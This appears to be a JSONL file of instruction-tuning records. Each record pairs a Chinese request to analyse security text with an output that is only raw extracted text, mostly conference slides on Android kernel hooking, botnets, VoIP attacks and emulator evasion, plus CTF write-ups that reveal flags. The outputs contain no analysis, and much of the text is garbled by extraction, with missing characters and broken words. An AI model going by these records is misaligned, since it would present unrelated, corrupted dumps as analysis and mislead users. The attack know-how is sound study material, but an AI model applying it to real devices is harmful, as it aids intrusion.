MITRE-ATT&CK-T1559-002 <https://attack.mitre.org/techniques/T1559/002/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI Know What You Are By the Smell of Your Wi-Fi Denton Gentry Try It! 1% 10% Poll: Wi-Fi at DEFCON for a demo 89% bad idea. worst idea. what could go wrong? SSID: SmellOfWifiTalk MAC Sublayer Management Entity (MLME) Probe Request: Asks nearby APs to respond. Association Request: join the Wi-Fi network Probe Request Association Request Probe Response Association Response Try It! SSID: SmellOfWifiTalk Signature: Information Elements Tag #0 Tag #1 Tag #33 Tag #36 Tag #48 Tag #70 Tag #45 Tag #191 Tag #221, Vendor OUI 00:17:f2, #10 Tag #221, Vendor OUI 00:10:18, #2 Tag #221, Vendor OUI 00:50:f2, #2 0,1,33,36,48,70,45,191, 221(0017f2,10),221(0010 18,2),221(0050f2,2) Try It! SSID: SmellOfWifiTalk Signature: Capability bitmasks Transmit power HT Capabilities bitmask (802.11n) VHT Capabilities bitmask (802.11ac) Try It! SSID: SmellOfWifiTalk 0,1,33,36,48,70,45,191,221 (0017f2,10),221(001018,2), 221(0050f2,2),txpow:13f9, htcap:006f,vhtcap:0f811032 Distinctiveness Over Time iPhone, 2007 0,1,48,50 iPhone 4s, 2011 0,1,48,50,45,221(001018,2),221(00904c,51),221(0050f2,2), htcap:0100,htagg:19,htmcs:000000ff iPhone 7, 2016 0,1,33,36,48,70,54,45,127,191,199,221(0017f2,10),221(001 018,2),221(0050f2,2),htcap:006f,htagg:17,htmcs:0000ffff, vhtcap:0f811032,vhtrxmcs:0000fffa,vhttxmcs:0000fffa,txpo w:13f9,extcap:000008 Try It! SSID: SmellOfWifiTalk Signatures in their Final Form Xbox One wifi4|probe:0,1,45,50,htcap:058f,htagg:03,htmcs:0000ffff|assoc:0,1,33 ,36,221(0050f2,2),45,htcap:058f,htagg:03,htmcs:0000ffff,txpow:1208 Nest Thermostat v3 wifi4|probe:0,1,45,221(001018,2),221(00904c,51),htcap:0062,htagg:1a,h tmcs:000000ff|assoc:0,1,33,36,48,45,221(001018,2),221(00904c,51),221( 0050f2,2),htcap:0062,htagg:1a,htmcs:000000ff,txpow:0f09 Chromecast v1 wifi4|probe:0,1,3,45,50,htcap:0120,htagg:03,htmcs:00000000|assoc:0,1, 48,50,127,221(0050f2,2),45,htcap:012c,htagg:03,htmcs:000000ff,extcap: 0000000000000140 Try It! SSID: SmellOfWifiTalk Multiple Signatures wifi4|probe:0,1,45,221(0050f2,8),191,127,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIm on Your Phone, Listening  Attacking VoIP Configuration Interfaces Stephan Huber | Fraunhofer SIT, Germany Philipp Roskosch | Fraunhofer SIT, Germany About us Stephan Security Researcher @Testlab Mobile Security (Fraunhofer SIT) Code Analysis Tool development IOT Stuff Founder of @TeamSIK 2 About us Philipp Security Researcher & Pentester @Secure Software Engineering (Fraunhofer SIT) Static Code Analysis IoT Vuln Detection Research Day 1 Member of @TeamSIK 3 TODO 4 Alexander Traud Acknowledgements Beer Announcement 5 Past Projects 6 Def Con 26: Tracker Apps DeF Con 25: Password Manager Apps Def Con 24: Anti Virus Apps Blackhat EU 2015: BAAS Security https://team-sik.org Whats next? 7 Wide distribution Complex software Readily accessible The Target Devices 8 Perfect World 9 Internet Guest Network Workstation Network VoIP Phone Network Real World 10 Internet Network VoIP Phones Guests Workstations Publicly reachable! Agenda 11 Background IoT Hacking 101 Findings DOS, Weak Crypto, XSS, CSRF Command Injection Authentication Bypass Memory Corruption Recommendations Responsible disc. experiences Summary 12 Background Architecture and Attack Targets ARM/ MIPS F L A S H Linux OS Kernel Bootloader 13 Architecture and Attack Targets ARM/ MIPS F L A S H Linux OS Kernel init uid:0 watchdog uid:0 sipd uid:0  loads kernel modules/drivers  spawn webserver  launch scripts  command interface   (web)server uid:0 Bootloader  basic setup  starts daemons    checks if daemons run   14 Architecture and Attack Targets ARM/ MIPS F L A S H Linux OS Kernel init uid:0 watchdog uid:0 sipd uid:0  loads kernel modules/drivers  spawn webserver  launch scripts  command interface   (web)server uid:0 Bootloader  basic setup  starts daemons    checks if daemons run   15 16 Methodology Abstract Methodology 17 Webserver is Running Web Pentesting Static Analysis Dynamic Analysis Setup VoIP Phone Attach HTTP Proxy Extract Firmware Emulation Abstract Methodology 18 Inject dynamic analysis tools Webserver", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0 Presented by: Dondi West, M.Sc., J.D. Associate, Booz Allen Hamilton Def Con 18 July 30th  August 1st 2010 Las Vegas, Nevada A paper arguing that the current rules of war can address the emerging issues raised by cyber warfare A Survey and Examination of the Adequacy of the Laws Related to Cyber Warfare 1 Disclaimers  The views expressed in this presentation and its supporting materials are those of the author alone and do not necessarily reflect the official policy or position of Booz Allen Hamilton, or any entity of the US Government.  This talk is for general information purposes and is not intended to be and should not be taken as legal or consulting advice on any particular matter. 2 Agenda  Introduction to CNO and the Actors Involved  Survey of the Laws with the Largest Impact on Cyber Warfare  Popular Issues Intensifying Cyber Warfare Debate  Five Reasons Why the U.S. Shouldnt Enter into Intl Treaties for Cyber Warfare  Conclusion, Question and Answers 3 Introduction  President Obamas 60-Day Study  2008 Cyber Attack against Georgia Infrastructure and Key Government Websites  Cyber Spies Penetrate US Electrical Grid (2009)  July 4th Cyber Attacks Against U.S. Results of 60 Day Study  Many Near-Term & Mid-Term Action Plans  No Mandate for Examining Laws of Cyber Warfare in Results of 60-Day Study  Intense Debate: International Treaty for Cyber Warfare 4 I. Introduction to Computer Network Operations and the Actors Involved 5 Introduction to CNO Joint Pub 3-13 Categorizes Cyber Acts Under the Domain of Computer Network Operations (CNO) 6 Computer Network Operations  The term Cyber is used in a overly broad manner  It is necessary to understand Cyber within the context of which of the three CNO domains are being referenced  Computer Network Defense (CND)  Includes actions taken via computer networks to protect, monitor, analyze, detect and respond to network attacks, intrusions, disruptions or other unauthorized actions that would compromise or cripple defense ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n因为公司经常会有批量动化测试的需求所以之前Python写了套类似于群控的机 调度系统 先想到的第个问题是如何使ADB控制机 开始我写了个 pyadbhelper 公共类内容是使 os.system 来调 adb 并且使  -s 参数来选择操作的设备 但实际上这个案很不稳定因为 adb 的代码既包含 server 端包含 client 端有时候 莫名其妙的就会把 server 端重启了(不同的环境有很多原因) 因为是多线程操作所以 旦重启那么其他线程有可能正在进 push pull 等操作就直接被中断导致任务失败 换种思路就是 python 实现个 client 端的协议与server 端通信有个现成的库可 供使: 1. google 的 python-adb 2. pure-python-adb 3. adbutils 作为名github star程师其实还有很多别的库但这三个是我认为相对稳定的(其实也 会有BUG) 在 Ubuntu 上如果想要使 adb先得配置好 udev 的 rule如果去百度搜索部分 教程都是教你动添加对应设备的 rule每换个机型就得去添加个残的话还 有可能写错 作为名 github star 程师我也找到了较便的解决案 android-udev-rules 前景   最后说个最重要的问题连接多台机定定定要带有独电源的USBHUB 且尽量要往贵的买 原因是如果电压不稳定设备就会频繁的断开重连造成很多莫名其妙的问题特别是在 push  pull 等占满 usb带宽的操作p着p着就卡死或者结束了 三", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CyberTank Website Web A website link was attached. ## Modifications (50 points) > The CyberTank website is still heavily being updated as the company is still in its startup phase. There may be some leftovers from one of the recent modifications... > > Flag format: CTF{32-hex} Let's check the website source code: ```html <!-- menu links --> <ul class=\"menu-links\"> <li><a href=\"/\">Home</a></li> <li><a href=\"/members\">Members</a></li> <!-- <li><a href=\"/research\">Research</a></li> --> </ul> ``` There's a link commented out in the menu. Let's visit it: ```html <div class=\"row justify-content-center\"> You found our secret hideout... CTF{6b9639fb154dfa15b3cfb83215449fb2} </div> ``` ## To the top (50 points) > CyberTank's legal team has created an extensive privacy policy. It's not easy to navigate, but luckily you can easily get back to the top... or not? > > Flag format: CTF{32-hex} If we visit the privacy policy page, we have a small icon that should take us back to the top: ```html <!--================================= back to top --> <div class=\"car-top\"> <span><img src=\"https://cybertank-resources.s3.amazonaws.com/images/car.png\" alt=\"\"></span> </div> ``` However, if we try to click it, it moves somewhere else. ```javascript /************************* Scroll to Top *************************/ POTENZA.scrolltotop = function () { var $scrolltop = $('.car-top'); $scrolltop.on('mouseover', function () { if (this.style.left.indexOf('30px') > -1) { this.style.left = '' this.style.right = '30px' } else { this.style.right = '' this.style.left = '30px' } return false; }); $scrolltop.on('click', function () { $('html,body').animate({ scrollTop: 0 }, 800); $(this).addClass(\"car-run\"); setTimeout(function(){ $('<div id=\"gratz\" style=\"position:fixed; top: 5px; width: 100%; padding: 10px; z-index: 999999\"><div style=\"background: #df1212; border: 1px solid white; padding: 10px; color: white; text-align: center\">Congratulations, you got a flag ;) '+atob(\"Q1RGezE2ZGRmMWQyZDE4MDVkOW", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n技 术 标 准 研发运营一体化能力成熟度模型 第 3 部分持续交付过程 The DevOps capability maturity model Part 3: Continuous delivery process 征求意见稿 2017 年 11 月 18 日 YDB XXXXXXXXX I 目 次 目次................................................................................... I 前言.................................................................. 错误! 未定义书签 研发运营一体化......................................................................... 1 1 范围 ............................................................................... 1 2 规范性引用文件 ..................................................................... 1 3 术语 ............................................................................... 1 下列术语和定义适用于本文件 ......................................................... 1 3.1 AB 测试 ab test .............................................................. 1 3.2 制品 artifact ............................................................... 1 3.3 代码复杂度 code complexity .................................................. 1 3.4 部署流水线 deployment pipeline .............................................. 1 4 缩略语 ............................................................................. 2 5 综述 ............................................................................... 2 6 配置管理 ........................................................................... 2 6.1 版本控制 .................................................................... 2 6.2 版本可追溯性 ................................................................ 3 7 构建与持续集成 ..................................................................... 4 7.1 构建实践 .................................................................... 4 7.2 持续集成 .................................................................... 5 8 测试管理 ........................................................................... 5 8.1 测试分层策略 ................................................................ 6 8.2 代码质量管理 ................................................................ 6 8.3 自动化测试 ....................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvances in Linux process forensics with ECFS Quick history  Wanted to design a process snapshot format native to VMA Vudu  http://www.bitlackeys.org/#vmavudu  ECFS proved useful for other projects as well Problem space  A process address space is complex with many components  ELF binary format (structural nuances)  Dynamic linking  Architecture specific data and structures  Kernel specific data and code (VDSO, VSYSCALL)  Multiple threads Hackers infect processes  Process infection is stealth and flexible  Processes are attacked in many ways  Viruses  Rootkits  Backdoors  Exploitation Process forensics capable tools  Volatility  Rekall  Second Look  ptrace system call  GDB  Core dumps Volatility in kernel land  Use full system memory dumps  Dwarf symbols to acquire high resolution insight into the Linux kernel  Can be used to detect virtually any kernel malware  System.map, and libdwarf are friendly for this (Creating kernel profiles) Volatility in process memory  detect_plt  A plugin for detecting PLT/GOT hooks by Georg Wicherski  Process snapshots are raw  Low resolution insight compared to kernel  Plugin development is a big task  No profile can exist for each process Full memory dump vs. process memory dump  Macrocosm: full memory dump  Microcosm: process memory dump  ECFS focuses on the Microcosm Extended core file snapshot  A custom core file format for forensics analysis  Backwards compatible with Linux Core files  HI-DEF resolution process-snapshots Overview of attack surface  ET_DYN Injection (.so files)  ET_REL Injection (.o files)  ET_EXEC Injection (exe files)  LD_PRELOAD  __libc_dlopen_mode  sys_ptrace  VDSO manipulation  Shellcode based loading  Symbol and code hijacking  PLT/GOT poisoning  Trampolines (inline hooks)  .ctors/.dtors patching  Text segment modifications and other anomalies Process memory layout Definition of process memory forensics & analysis  Understanding the process layout and structure  Learning the programs runtime characteristics ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 二十二资源 + OnlineTraining + [WebApplication Exploits and Defenses](https://google-gruyere.appspot.com) + [The Exploit Database](https://www.exploit-db.com/) + [Udacity](https://cn.udacity.com/) + Bug Bounty Platforms + [Hackerone.com](https://Hackerone.com) + [Bugcrowd.com](https://bugcrowd.com/) + [Synack.com](https://www.synack.com/) + [Cobalt.io](https://cobalt.io/) + Video Tutorials + [youtube.com/yaworsk1](https://youtube.com/yaworsk1) + [Seccasts.com](https://www.youtube.com/c/nVisium/) + [Twitter#infsec](https://twitter.com/hashtag/Infsec) + [Twitter@disclosedh1](https://twitter.com/disclosedh1) + [Web Application Hackers Handbook](https://www.amazon.cn/%E9%BB%91%E5%AE%A2%E6%94%BB%E9%98%B2%E6%8A%80%E6%9C%AF%E5%AE%9D%E5%85%B8-Web%E5%AE%9E%E6%88%98%E7%AF%87-Dafydd-Stuttard/dp/B008FNO9GK) + [Bug Hunters Methodology](https://github.com/jhaddix/tbhm) + Recommended Blogs + [philippeharewood.com](http://philippeharewood.com/) + [Philippe'sFacebookPage](https://www.facebook.com/phwd-113702895386410) + [fin1te.net](https://whitton.io/) + [NahamSec.com](http://nahamsec.com/) + [blog.it-securityguard.com](http://blog.it-securityguard.com/) + [blog.innerht.ml](http://blog.innerht.ml/) + [blog.orange.tw](http://blog.orange.tw/) + [Portswigger Blog](http://blog.portswigger.net/) + [Nvisium Blog](https://nvisium.com/blog/) + [blog.zsec.uk](https://blog.zsec.uk/) + [Bug Crowd Blog](https://blog.bugcrowd.com/) + [HackerOne Blog](https://www.hackerone.com/blog)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# vault-door-5 Reverse Engineering, 300 points ## Description: > In the last challenge, you mastered octal (base 8), decimal (base 10), and hexadecimal (base 16) numbers, but this vault door uses a different change of base as well as URL encoding! ```java import java.net.URLDecoder; import java.util.*; class VaultDoor5 { public static void main(String args[]) { VaultDoor5 vaultDoor = new VaultDoor5(); Scanner scanner = new Scanner(System.in); System.out.print(\"Enter vault password: \"); String userInput = scanner.next(); String input = userInput.substring(\"picoCTF{\".length(),userInput.length()-1); if (vaultDoor.checkPassword(input)) { System.out.println(\"Access granted.\"); } else { System.out.println(\"Access denied!\"); } } // Minion #7781 used base 8 and base 16, but this is base 64, which is // like... eight times stronger, right? Riiigghtt? Well that's what my twin // brother Minion #2415 says, anyway. // // -Minion #2414 public String base64Encode(byte[] input) { return Base64.getEncoder().encodeToString(input); } // URL encoding is meant for web pages, so any double agent spies who steal // our source code will think this is a web site or something, defintely not // vault door! Oh wait, should I have not said that in a source code // comment? // // -Minion #2415 public String urlEncode(byte[] input) { StringBuffer buf = new StringBuffer(); for (int i=0; i<input.length; i++) { buf.append(String.format(\"%%%2x\", input[i])); } return buf.toString(); } public boolean checkPassword(String password) { String urlEncoded = urlEncode(password.getBytes()); String base64Encoded = base64Encode(urlEncoded.getBytes()); String expected = \"JTYzJTMwJTZlJTc2JTMzJTcyJTc0JTMxJTZlJTY3JTVm\" + \"JTY2JTcyJTMwJTZkJTVmJTYyJTYxJTM1JTY1JTVmJTM2\" + \"JTM0JTVmJTY0JTYyJTM2JTM5JTM0JTM2JTYyJTYx\"; return base64Encoded.equals(expected); } } ``` ## Solution: Let's use Javascript to decode the password: ```console root@kali:/media/sf_CTFs/pico/vault-door-5# node > decodeURIComponent(Buffer.from(\"JTYzJT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNathan Hamiel Principal Consultant Associate Professor at UAT Marcin Wielgoszewski Security Engineer  Reliance on tools can = Fail!  Many more people tes4ng web apps  Vendors play catch-up  Success is on your shoulders  Difficult cases  APIs and specialized data formats  Sequenced opera4ons  Randomized data  Language specific  Object-oriented  Byte compiled  Fast  Wide support  Many security tools wriLen in Python  Plenty of help available  Plenty of resources for learning available w3af SpikeProxy sqlmap ProxyStrike wapi4 sulley Peach Canvas Pyscan DeBlaze Scapy MonkeyFist Pcapy MyNav Idapython  CPython  hLp://python.org  Jython  hLp://jython.org  IronPython  hLp://ironpython.net  Start with hLp://python.org  hLp://docs.python.org/  hLp://docs.python.org/tutorial/index.html  Googles Python Class  hLp://code.google.com/edu/languages/google- python-class/  There are differences between Python 2.x and 3.x  Walk like a duck and quack like a duck Standard Lib  hLplib  urllib / urllib2  urlparse  HTMLParser  struct  xml  json (Python 2.6)  difflib 3rd Party  hLplib2  lxml  zsi / suds  PyAMF  pydermonkey  Twisted  hLplib  Standard HTTP Module  Good for GETs and POSTs  HTTP / HTTPS support  hLplib2  Expanded HTTP method support  Supports various auth methods  Automa4cally follows 3xx redirects  urllib  High level module for opening resources  Has URL encoding capabili4es  urllib2  Expanded support for handlers  Merged in Python 3 along with urlparse  Examples  Perform transi4on magic  URL encoding and Escaping  String methods (base64 / hex / rot13, etc)  Data representa4ons (decimals / en44es / etc)  DharmaEncoder  Provides methods to encode and wrap values  hLp://hexsec.com/labs  Do the legwork  Know your app  Know your parameters  Know your data  Work smarter  Create accurate ranges  itertools methods  Dont empty the clip  Web fuzzing lib for Python  hLp://code.google.com/p/pywebfuzz/  Usable in Python 2.x  Easy to distributable and repeat tests  Convenience  Fuzzdb values acc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# WhiteHat 2020 finals Team: msm, chivay, c7, k.2, eternal, rodbert, nazywam ### Table of contents * [reversing01](reversing01) * [programming02](programming02) * [programming03](programming03) * [misc04](misc04)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBotfox  基於瀏覽器與社交工程之殭屍網路研究 Botnet based on Browser and Social Engineering 動機 你知道嗎 現行的安全防護不像你想像的那般健壯 ... 實驗證實 它可以繞過目前所有常見的安全防護 ... 你相信嗎 它的技術含量低到只有我用它 ... 你相信嗎 它的建置成本很低很低 ... 你認同嗎 大腦本身就是一種永遠可以被利用的 0day... 自我介紹 Ant yftzeng@gmail.com 中研院 自由軟體授權 台灣駭客年會講師 Wow!USB 隨身碟防毒 Wow!ScanEngine 掃毒引擎 Wow!ARP 防護軟體 經濟學 混沌 複雜 程式設計師 系統管理師 資訊安全實習生 自由軟體鑄造場 FreeBSD 官方中文文件維護者 主題 來到 Web 2.0 的時代 歡迎 hawaii@flickr.com http://www.flickr.com/photos/hawaii/2089328125/ pablolarah@flickr.com http://www.flickr.com/photos/pablolarah/3549205887/ libraryman@flickr.com http://www.flickr.com/photos/libraryman/2528892623/ daysies@flickr.com http://www.flickr.com/photos/daysies/2554510463/ 來到 Cloud 的時代 歡迎 mediaeater@flickr.com http://www.flickr.com/photos/mediaeater/3476903211/ jaxmac@flickr.com http://www.flickr.com/photos/jaxmac/193001859/ Power  Robust  Convenience 當一切都變得不再單純 ... 來到 Web 2.0 的時代 歡迎 Bot 2.0 的時代 (aka. CloudBot) Bot 1.0 Attacker C&C Server Zombies Victims Bot 2.0 (aka CloudBot) Attacker Tor Legitimate Server Bot 1.0 Bot 2.0 Botnet 的定義 指由 Malware 操控平台所成形成的一種 Command and Control (C&C) Topology 透過 Botnet 架構讓 Hacker 能夠大量且自動化地操控 Bot  來源 : Jeremy Chiu (aka Birdman) Workshop on Understanding Botnets of Taiwan 2009 第一屆台灣區 Botnet 偵測與防治技術研討會 殭屍網路的 演化史 Photo: Dunechaser@flickr.com http://www.flickr.com/photos/12426416@N00/490888951 演化趨勢 推斷未來模式 以 Protocol 分群 Protocol 1. IRC 2. HTTP 3. P2P 4. Instant Messenger (MSN etc.) 5. Own communication Botnet Trends Analysis Photo: wil.eeam@flickr.com http://www.flickr.com/photos/wileeam/2410989725/ Botnet Trends Analysis 1. 高隱匿難追蹤 2. 利用社交工程 3. 開始注意嵌入式設備 4. 以感染的數量換取其它的優勢 Photo: wil.eeam@flickr.com http://www.flickr.com/photos/wileeam/2410989725/ http://dronebl.org/blog/8 Router Botnet http://dronebl.org/blog/8 * called 'psyb0t' * maybe first botnet worm to target routers and DSL modems * contain shellcode for many mipsel devices * not targeting PCs and Servers * user multiple strategies for exploitation, such as bruteforce user/pass * harvests usernames and passwords", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021 TXOne Networks Inc. Taking Apart and Taking Over ICS-SCADA Ecosystems A Case Study of Mitsubishi Electric Mars Cheng Selmon Yang August, 2021 @DEF CON 29  2021 TXOne Networks Inc. Who are we? A subsidiary company under Keep the Operation Running Threat Defense Expertise Industry Adaptive Solution OT-Focused Technology Trend Micro Inc  2021 TXOne Networks Inc. x Who are we? x Mars Cheng  Spoke at Black Hat, HITB, HITCON, SecTor, ICS Cyber Security Conference, InfoSec Taiwan and etc.  Instructor of Ministry of National Defense, Ministry of Education, Ministry of Economic Affairs and etc.  General Coordinator of HITCON 2021  Vice General Coordinator of HITCON 2020 Threat Researcher at TXOne Networks Selmon Yang Staff Engineer at TXOne Networks  IT/SCADA Protocol Parsing  Linux Kernel Programming  Honeypot Deployment & Optimization  In-depth ICS research specialist  Has spoken at CYBERSEC, HITB, and HITCON  2021 TXOne Networks Inc. Outline  Modern ICS/SCADA Ecosystems Overview  Dissect and Compromise Mitsubishi Ecosystems  A Story of Reporting the Vulnerability  Mitigation and Closing Remarks  2021 TXOne Networks Inc. Modern ICS/SCADA Ecosystems Overview  2021 TXOne Networks Inc. Modern ICS/SCADA Ecosystems Overview  Market Share  Mitsubishi Electric  Largest in Asia Pacific  Top 3 in Global Market https://ipcsautomation.com/blog-post/market-share-of-different-plcs/  2021 TXOne Networks Inc. Modern ICS/SCADA Ecosystems Overview  PLC Manufacturers Ranked in Order of Industrial Automation Net Annual Sales Revenue Rank PLC Manufacturers Industrial Automation Revenue (millions of USD) Consolidated Revenue (millions of USD) 1 Siemens (Simatic) $18,281 $98,636 2 Mitsubishi Electric (Melsec) $13,346 $41,120 3 Emerson (GE Fanuc) $12,202 $18,372 4 Hitachi $8,654 $86,250 5 Bosch (Rexroth) $8,523 $88,319 6 Schneider Electric (Modicon) $7,172 $30,861 7 Eaton (Cutler-Hammer) $7,148 $21,390 8 Rockwell Automation (Allen Bradley) $6,694 $6,694 9 ABB (B&R Automation) $6,273 $27,978", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConfidential to SEWORKS Copyright 2013 SEWORKS Inc. All rights reserved. Android Hooking Attack SEworks Hong Brothers Minpyo Hong, Dongcheol Hong hinehong@seworks.co.kr 2  SEWORKS Co., Ltd  SEworks is a company created by a hacker.  Main areas of mobile security, and Android, Windows App protected areas, such as obfuscation is mainly research.  Minpyo Hong (Nick : Secret)  SEworks CEO(Chief Executive Officer) and WOWHACKER team founder/admin.  Dongcheol Hong (Nick : hinehong)  SEworks CTO(Chief Technology Officer) and WOWHACKER team admin. 3  Kernel Hooking  Hooking using LKM Kernel module.  Library Hooking  Android system library module hooking. 1. KERNEL HOOKING Android Hooking Attack 5  Kernel Hooking  Most of Kernel rootkit using LKM (loadable kernel module)  Samsung's kernel source location \"opensource.samsung.com  Look at the README.txt HOW TO BUILD KERNEL 2.6.35 FOR Sxxxxx 1. Visit http://www.codesourcery.com/, download and install Sourcery G++ Lite 2009q3-68 toolchain for ARM EABI. 2. Extract kernel source and move into the top directory. 3. Execute 'make aries_kor_defconfig'. 4. Execute 'make' or 'make -j<n>' where '<n>' is the number of multiple jobs to be invoked simultaneously. 5. If the kernel is built successfully, you will find following files from the top directory: 6  LKM module compile  Source file and Makefile put the same directory.  Using make  Gallaxy S example. obj-m += test.o all: make -C /home/hinehong/sxxxxx/Kernel M=$(PWD) CFLAGS_MODULE=-fno-pic ARCH=arm CROSS_COMPILE=/home/hinehong/CodeSourcery/Sourcery_G++_ Lite/bin/arm-none-eabi- modules 7  LKM module compile  Install : insmod Module name  View list : lsmod Module name  Delete : rmmod Module name  init_module  Dynamic memory allocation function is kmalloc in kernel. 8  Sys_call_table  In Linux, the system call functions defined in sys_call_table.  /proc/kallsyms  System.map of the kernel source code 9  How to get the address of dynamically sys_call_table  Using vector_swi handler.  vect", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ASIS CTF 2019 Finals Team: ak, c7, msm, rodbert, nazywam, sasza, rev, Eternal ### Table of contents * [Serifin (crypto)](serifin) * [Primordial (crypto)](primordial) * [Close primes (ppc)](close_primes) * [Truncated form (ppc)](truncated_form) * [Secrets (forensics)](secrets) * [Protected area 1(web)](protected_area1) * [ShareL (web)](sharel) * [True zero (re)](true_zero)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n19.07.2013 DEX EDUCATION 201 ANTI-EMULATION TIM STRAZZERE - HITCON 2013 Friday, July 19, 13 WHOAMI  Lead Research & Response Engineer @ Lookout Mobile Security (yes.. an av)  Reversed the Android Market/Google Play Protocol  Always enjoyed reversing exotic platforms, writing tools to automate the mundane  Junkie for reversing mobile malware, creating write ups and teaching other to help raise the bar Friday, July 19, 13 AGENDA  Recap of Dex Education 101  Who is evading emulators / How is it done  Who is hiding emulators / How is it done  Easy detection - Hard time hiding  Basic emulator detection / QEMU-FOO  Advanced detection of emulator systems  TLDR; Conceptualizing detection Friday, July 19, 13 RECAP OF DEX EDUCATION 101  Decompilers and disassemblers are easy to break but no one was doing it!  Predicting these breakages can help up prevent and detect attacks  Advances since then;  DexGuard (Most sophisticated Android Malware)  HoseDex2Jar  Slides available: www.strazzere.com/papers/DexEducation-PracticingSafeDex.pdf Friday, July 19, 13 RECAP OF DEX EDUCATION 101  HoseDex2Jar used the big ego tactic of injecting files into the header  Author even said hiTim in one of his method names (HOW NICE)  github.com/strazzere/dehoser  Latest example uses some simple crypto inside of native code - go play! Friday, July 19, 13 Friday, July 19, 13 WHO IS EVADING EMULATORS?  Security Researchers  Game cheaters / hackers  Devs against competition  Malware authors (?) Friday, July 19, 13 MOTIVE FOR EVASION?  Games detect emulators to prevent cheating/abuse  Must uniquely identify devices to prevent referral abuse/easy cheating  Attempt to stop farming/cheats  App devs want to protect secrets  Security researchers want to break stuff, get famous and pwn people  duh!  Malware authors want to avoid detection of their products Friday, July 19, 13 DETECTION IMPORTANT?  Games / App / Research / Malware  All have different use cases and trying to detect different segments  Games want ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nText 腳本小子的告白 -硬碟的秘密大公開 Confessionsofscriptkiddie-HardDriveSecretLetOut Who Am I? thx OSSLab 成立者 練過神功 所以只會硬不太 會軟 我是怎樣開始踏上研究 DIY 萬歲 這就是資料恢復真實成本 要找到一樣相容硬碟 又不保證成功率 碟片上有隱性刮傷 能Extract 的資料是否客戶要的 設備成本 (低塵操作環境,資料恢復設備) 簡單說 有時這跟賭博行業差不多 終極好人技已講完收工 議程三分鐘 已經講完了 大 家現在可散場好了 來這做行 業賺錢. 向水電工學習的講師表示我當然可 以超過三分鐘 這可是50分鐘議程 範例 學妹說她的硬碟IC 燒掉了 身為一個水電工,當然隨身攜帶電表,為了學 妹的資料,我掏出我的..........................電表. 水電工 國中工藝課實習教學 拿一顆正常的硬碟 通電 ,拿出電表量就會發現 這邊要 先確定GND(負極)腳位 ,再把黑針放到各接點就會發現. 分析後的硬碟電源供應圖 這樣燒掉的PCB 可修好讓它 動嘛? 你看這結構, 如果5V 超壓 會怎樣? 很有機會燒掉很多元件, 請準備砍掉重練 SPI Flash 晶片 學妹早就不在了 所以變成日立電路板 請見諒 簡單說 就是壞掉那 就找那好的替換 原資料碟電路板上的 儲存性元件就要保留 我不想只做水電工可以嘛? 於是我買傳說中的硬碟維修設備 PC3000 http://www.acelaboratory.com/ 這是一張很貴的PCI 卡 昂貴的資料恢復設備原理 FPGA IC .內建ATA IP Core.並且可用於加密保護軟體不 被複制 電源控制模塊. USB serial port.用於硬碟TTL終端通訊控制. 能執行工作 對各廠牌硬碟固件區進行讀寫操作. 對不良磁碟 鏡像ATA Reset, Power reset提高讀取成功 率. 買了設備給的外星技術文件 我是地球人(也沒有烏克蘭女 友或老婆做我的翻譯年糕) 兔兔老婆表示震怒!!!!!!!!!! 兔老婆說既然娶了中國老婆就要看中文的 作者有在百度百科 這本是聖 經嗎? 戴士劍2003年出版第一部數據 恢復技術書促進了數據恢復產業發展 帶動數據恢復產業 走向科學正規有序的發展道路 我自己弄到英文的技術手 冊.... 對岸的國X信息中心表示 ,感謝台灣同胞無私的分享 司法數位鑑識人員 使用心得(一) 我們原本以為硬碟本身不需要維修對於故障硬碟內的數據直接拷貝硬盤 出問題了要想得到裡面的data 要先修好韌體的才有可能進行資料拷貝 所以這方面的學習還得加強好歹我有基礎啊看說明書對硬盤的原理作了 大堆介紹然後對PC3000UDMA操作菜單進行了功能的說明但隨著越來越 深入的了解而是你操作極其太復雜簡直一不留神數據徹底變沒 經過半月的學習進行資料恢復過程中發現PC3000UDMA對硬盤的多種功 能處理方式都不一樣一個功能之針對一個問題而主要是一個功能必須結 合幾個功能搭配使用才可能有效注意哦是有可能有效果那就是說也 有可能無效這不是簡單的加減法如果關鍵地方搞錯了你功能鍵的前後 順序搞反了那恭喜你了你的硬盤不僅不能修復還將徹底廢掉硬盤而 這種情況機率還相當的高我現在也搞懂了為什麼原來拿數據出去恢復時 數據恢復公司的工程師就是不願意讓你在旁邊看美其名曰技術保密實 際上是在操作失誤後方便徹底毀滅數據讓你在其他地方都死無對證 司法數位鑑識人員 使用心得(二) 